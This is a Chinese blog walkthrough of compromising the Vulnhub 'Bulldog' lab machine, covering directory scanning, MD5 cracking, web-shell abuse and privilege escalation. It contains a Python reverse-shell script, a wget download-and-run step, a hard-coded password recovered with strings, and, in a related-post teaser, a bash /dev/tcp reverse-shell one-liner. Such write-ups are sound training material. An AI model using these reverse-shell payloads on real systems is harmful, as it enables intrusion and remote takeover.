渗透靶机之BULLDOG

于 2024-02-02 16:11:43 发布
阅读量1.2k 收藏 12
点赞数 11
文章标签: 靶机 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43235703/article/details/100522855
版权

靶机渗透之BULLDOG

渗透环境:

攻击机:kali(10.0.10.198)

靶机:vmbox(10.0.10.208)

连接模式:全部为桥接

探嗅目标

安装好我们的靶机之后开机,然后你的ip地址就出现在靶机界面上面,也省了我们用kali来扫
[外链图片转存失败(img-HXfWeewa-1567501680558)(tu\1.png)]

但是多少这达不到我们模拟实战的过程,真正的渗透谁会把地址摆着给你啊对不对,所以还是要动手用netdiscover来扫一波,直接扫出来然后上nmap扫端口

[外链图片转存失败(img-BA55Qtou-1567501680559)(tu\2.png)]

进行渗透

访问web页面,出现一只斗牛犬

[外链图片转存失败(img-XfJK8bEE-1567501680559)(tu\3.png)]

也还行,挺可爱,查看源码也找不到什么端倪,那干脆dirb一波目录

root@cdd:~# dirb http://10.0.10.208

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Sep  3 12:21:24 2019
URL_BASE: http://10.0.10.208/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612  

---- Scanning URL: http://10.0.10.208/ ----
==> DIRECTORY: http://10.0.10.208/admin/   
==> DIRECTORY: http://10.0.10.208/dev/ 
+ http://10.0.10.208/robots.txt (CODE:200|SIZE:1071)   
   
---- Entering directory: http://10.0.10.208/admin/ ----
==> DIRECTORY: http://10.0.10.208/admin/auth/  
==> DIRECTORY: http://10.0.10.208/admin/login/ 
==> DIRECTORY: http://10.0.10.208/admin/logout/
   
---- Entering directory: http://10.0.10.208/dev/ ----
==> DIRECTORY: http://10.0.10.208/dev/shell/   
   
---- Entering directory: http://10.0.10.208/admin/auth/ ----
==> DIRECTORY: http://10.0.10.208/admin/auth/group/
==> DIRECTORY: http://10.0.10.208/admin/auth/user/ 
   
---- Entering directory: http://10.0.10.208/admin/login/ ----
   
---- Entering directory: http://10.0.10.208/admin/logout/ ----
   
---- Entering directory: http://10.0.10.208/dev/shell/ ----
   
---- Entering directory: http://10.0.10.208/admin/auth/group/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
(Try using FineTunning: '-f')
   
---- Entering directory: http://10.0.10.208/admin/auth/user/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
(Try using FineTunning: '-f')
   
-----------------
END_TIME: Tue Sep  3 12:23:15 2019
DOWNLOADED: 32284 - FOUND: 1

有几个可疑页面,一个一个看,第一个肯定是admin;进去后是一个登陆框,弱口令登陆没用,接着看下一个

[外链图片转存失败(img-ZEL1yhvF-1567501680559)(tu\5.png)]

看到还有一个dev/shell的目录,进去看看;但是是用不了的

[外链图片转存失败(img-Jr7I07z0-1567501680559)(tu\6.png)]

网上翻一层到dev,打开源码发现了一些MD5

[外链图片转存失败(img-ears25Sn-1567501680560)(tu\7.png)]

[外链图片转存失败(img-qSmMV5AW-1567501680560)(tu\8.png)]

试着丢去解码,但是发先前面有几个是解不出的,最后几个可以,解码出了之后感觉像是用户名和密码之类的,果断拿去登陆,用户名是@前的用户名

[外链图片转存失败(img-EqF0kgcs-1567501680560)(tu\9.png)]

登陆成功后再去访问webshell,可以看到webshell可以使用了,是cmd命令,但是只能用它指定的几个词,用其他的没用

[外链图片转存失败(img-hJCiA3KA-1567501680561)(tu\10.png)]

回到我们卡里,新建一个文件夹fakeshell

mkdir fakeshell

放出脚本代码,可以在win编写改好后缀之后拖进kali

import socket,subprocess,os
 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 
s.connect(("接收机ip",反弹的端口))  
 
os.dup2(s.fileno(),0)
 
os.dup2(s.fileno(),1)
 
os.dup2(s.fileno(),2)
 
p=subprocess.call(["/bin/bash","-i"])

进入我们刚新建的fakeshell,然后把shell.py放进来,建立一个http服务器

python -m SimpleHTTPServer 80

回到靶机的webshell页面,我们用命令把我们的shell下载下来

pwd&wget http://10.0.10.198/shell.py

[外链图片转存失败(img-Dkr5cz0o-1567501680561)(tu\11.png)]

可以看到已经下载成功了,接下来在kali监听端口(端口多少取决与你编辑脚本的时候,填入的是多少端口,我这里用443).打开监听后,回到靶机webshell运行shell,然后kali就会反弹shell

pwd&python shell.py

[外链图片转存失败(img-CiWDDPSv-1567501680561)(tu\12.png)]

拿到shell之后我们cd到home/bulldogadmin/下,然后ls,ls你会发现啥都没有,因为有一些是隐藏文件需要用

ls -la

[外链图片转存失败(img-1O1J4mAB-1567501680562)(tu\13.png)]

进去之后看到一个文件夹.hiddenadmindirectory,继续跟进(记得.也要打上去,不然报错你就一脸懵)

[外链图片转存失败(img-IrUnABWG-1567501680562)(tu\14.png)]

用strings看一下最长的那串

/lib64/ld-linux-x86-64.so.2
32S0-t
libc.so.6
puts
__stack_chk_fail
system
__libc_start_main
__gmon_start__
GLIBC_2.4
GLIBC_2.2.5
UH-H
SUPERultH
imatePASH
SWORDyouH
CANTget
dH34%(
AWAVA
AUATL
[]A\A]A^A_
Please enter a valid username to use root privileges
	Usage: ./customPermissionApp <username>
sudo su root
;*3$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7585
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
customPermissionApp.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment

东西有点多,不要慌,一点一点看

GLIBC_2.2.5
UH-H
SUPERultH
imatePASH
SWORDyouH
CANTget
dH34%(

从程序中分析出这几行应该是密码,但是最后的H不是密码的一部分,密码:SUPERultimatePASSWORDyouCANTget

执行python shell完全交互式

sudo python -c 'import pty; pty.spawn("/bin/bash")'

提示你输入密码,我们提交刚才得到的超级密码即可拿到root

[外链图片转存失败(img-9pdEA73M-1567501680563)(tu\15.png)]

拿到root虽然说已经是提权成功了,但是我们没走到最终那条路

[外链图片转存失败(img-EO7AlovY-1567501680563)(tu\16.png)]

总结

本次渗透正式结束,本次渗透涉及到了MD5解密,cmd命令行的使用,以及发掘隐藏文件,还有就是提权;多打靶机可以接触到更多不同的拿shell和提权的方法,丰富自己的渗透经验

Muha1
关注
[网络安全自学篇] 七十五.Vulnhub靶机渗透bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
渗透测试实战3——bulldog2靶机入侵
浅浅的博客
04-25 1034
一、实验环境 Kali攻击机:192.168.247.149 bulldog 2靶机:192.168.247.150、(192.168.247.151) 开始之前,需先登录bulldog2。账号:dirty,密码:pass,并使其获取IP 二、实验步骤 (一)主动信息收集 1、扫描存活主机 2、扫描开放端口(192.168.247.150和192.168.247.151开...
渗透测试实战2——bulldog1靶机入侵
浅浅的博客
04-25 1018
一、实验环境 攻击机(Kali):192.168.247.160 靶机bulldog1):192.168.247.148 二、实验步骤 (一)主动信息收集 1、主机发现 2、端口扫描 3、端口服务版本扫描 (二)Web渗透 http服务(80端口) 1、访问目标主机 没有发现什么有用信息。 2、网站指纹信息扫描(whatweb) ...
靶机渗透bulldog
学信安技术 卫国家之门
11-04 4684
一. bulldog靶机安装 1. 下载bulldog 靶场地址:Bulldog - VulnHub (可自行下载) 百度网盘:bulldog 提取码:qrnf 2. 将下载好的靶机存放在想存放的地方,建议放在其他虚拟机相同的目录下 3. 打开VMware,左上角文件 - - 打开 - - 找到存放bulldog的位置 4. 开启bulldog(开启后无需进行其他操作) 二. bulldog靶机渗透 设备信息: kali(NAT)IP:192.168.110.140 bulldog(NAT)IP:
渗透测试】靶机渗透Vulnhub-bulldog
SunnyCat
06-01 3074
目录前言一、bulldog靶机安装二、bulldog靶机渗透1、信息搜集2、Web渗透--后台登录3、Web渗透--命令注入&nc反弹shell4、权限提升渗透步骤回顾感悟 前言 bulldog靶机渗透有很多的前辈都做了教程,我这篇也是参考了许多前辈的博客,但是中间还是有很多不懂得地方,官方说有两条路可以拿到root,我只找到了一条。以下内容均是我作为一个菜鸡实操之后的所得,为了留个印子记下来。 参考博客: https://blog.csdn.net/Eastmount/article/detai
Bulldog靶机渗透
Sher__lock的博客
12-17 195
Bulldog靶机渗透 1. 获取地址IP,确定靶机IP是192.168.119.134 2.扫描目标主机信息 3.爆破目标主机目录 4.通过翻译得知这个网页是给承包商看的 5.查看网页的源码,查找有用信息 6.发现可以解码,使用md5解码,通过解码得知两个结果,bulldog Billdoglove 7.猜解密码 7.登陆进去,查看信息 8.尝试命令注入 ...
靶机实战-bulldog1
滕财然的博客
01-19 1052
bulldog1-靶机实战靶机实战:bulldog11、主机发现2、扫描端口3、web渗透(80端口)4、提权 靶机实战:bulldog1 先要知道对方的IP是否存活,也就是主机发现 1、主机发现 netdiscover -i etho -r IP/网段 属于主动 -i 指定网卡 -r 指定网段 找到目标靶机IP:192.168.232.134 也可以用nmap -sn 扫,看自己心情。...
bulldog2 靶机渗透
Sher__lock的博客
12-18 340
bulldog2 靶机渗透 1.先做主机发现 2.查看目标靶机开通的服务,发现目标靶机只开通了80端口 3.使用http服务登录主页 4.发现网站关闭了注册功能 5.发现用户遍历漏洞 6.查看下载好的源码,获取用户名 7.使用burpsuite抓用户登录的包,然后改包,创建一个新的用户 8.创建一个新的账户fxh 9.可以水平越权,使用注册好的用户账号登录,并抓包,发现密码是明...
白菜新手渗透测试靶机练习bulldog1
weixin_43912601的博客
09-01 614
步骤 1.信息收集:ip 端口 服务 操作系统 版本 2.漏洞扫描或漏洞发现:eg:ms17-010 3.漏洞利用:拿到shell 4.提权 5.留后门,清痕迹 6.渗透测试报告 主机发现: dhclient 动态获取ip netdiscover -i eth0 -r 192.168.68.0/24 nmap 192.168.68.0/24 -sn nmap -T4 -sV -O -p 80,2...
靶机渗透测试实战(三)——Bulldog1渗透实战
橘子女侠
05-09 3779
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (1)信息收集——主机发现 (2)信息收集——端口扫描 (3)信息收集——操作系统扫描 (4)Web渗透 四. 实验总结 一. 实验环境 靶机:IP地址暂时未知; 测试机:kali IP地址:192.168.37.131 测试机:物理机win7 二. 实验流程 信息收集——主机发现 信息收集——端口扫描 ...
Vulnhub-Bulldog靶机实战
御七彩虹猫
03-24 1467
Vulnhub-Bulldog靶机实战
渗透项目】Bulldog网站渗透
命运的旋律的博客
12-13 757
Bulldog网站渗透 文章目录Bulldog网站渗透1.渗透思路测试环境测试步骤1.信息收集主机发现端口扫描操作系统扫描2.漏洞探测网站指纹信息扫描目录扫描3.信息利用4.漏洞利用5.权限提升 1.渗透思路 进行信息收集,根据开放的端口以及服务,寻找可行的渗透方法 在未知目标主机的情况下,使用netdiscover主机发现获得主机IP地址 得到主机的IP地址后,使用masscan进行快速的端口...
靶机渗透(一)——bulldog2
qq_45751902的博客
04-16 2367
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/Bulldog2.ova 二、bulldog2靶机搭建 将刚刚下载完成的bulldog2.ova导入到VM VirtualBox,并且修改靶机的网络,注意红框,下面能用到 修改完打开就是这样的 三、kali攻击机 打开vmware中的虚拟网络编辑器,将kali网络类型配置成桥接模式,桥接至(不要自动,找到靶机的页面名称) 四、攻击 1.在kali上查看ip ifconfig 发现ip地址为192.1
Bulldog-1 渗透测试
Darklord.W
04-09 423
一\开启bulldog虚拟机,并打开KALI,进行netdiscover扫描 netdiscover -i eth0 -r 192.168.8.0/24 可以看到,192.168.8.133为目标主机 2\进行masscan扫描 3\进行nmap扫描,端口,服务,版本,系统等 4\可以看见开放了23,80,8080端口,服务为ssh以及web服务 先手工测试ssh服务,s...
bulldog渗透总结
qq_45300786的博客
06-13 436
运行环境: 测试机:kali 靶机:bulludog 主机发现 arp-scan -l 或者 netdiscover -i eth0 -r 192.168.223.0/24 或者 nmap -sn 192.168.223.0/24 -oG - (不管是不是自己都要扫) 扫描出来是192.168.223.233 端口扫描 masscan --rate=10000 -p0-65535 192.168.223.233 masscan扫描速度快,但准确度不高,可以多扫几次,以防漏扫 或者 nmap -sS 1
靶机渗透测试实战(四)——Bulldog2渗透实战
橘子女侠
05-10 3061
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (1)信息收集——主机发现 (2)信息收集——端口扫描 (3)信息收集——操作系统扫描 (4)渗透测试 四. 实验总结 一. 实验环境 靶机Bulldog2 IP地址暂时未知; 测试机:kali IP地址:192.168.37.131 测试机:物理机win7 二. 实验流程 信息收集——主机发现 信息...
bulldog1靶场渗透
b1n的博客
08-26 201
echo 'bash -i >& /dev/tcp/192.168.22.135/1234 0>&1' | bash #中间的ip是主机kali的地址,监听端口设置的啥就写啥。4、然后再去访问http://192.168.22.139/admin,用刚才的猜想用邮箱前的疑似用户名加上后面解密出的当做用户名和密码进行登录。5、再去访问http://192.168.22.139/dev/shell,发现可以成功访问,列出来的命令都可以执行。
kali渗透综合靶机(二)--bulldog靶机
W小哥
03-07 1055
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 二、bulldog靶机搭建 靶机: 将下载好的靶机环境,用VM VirtualBox导入即可使用,管理->导入虚拟电脑 设置网络模式,网卡选择仅主机模式 kali攻击机: 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至VirtualBox...
kali linux渗透测试靶机
最新发布
02-23
4. Hack The Box:Hack The Box是一个在线平台,提供了一系列的渗透测试靶机,每个靶机都有不同的漏洞和挑战,可以用于测试和提高渗透测试技能。 这些渗透测试靶机都可以在Kali Linux上进行安装和使用。通过实践和...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值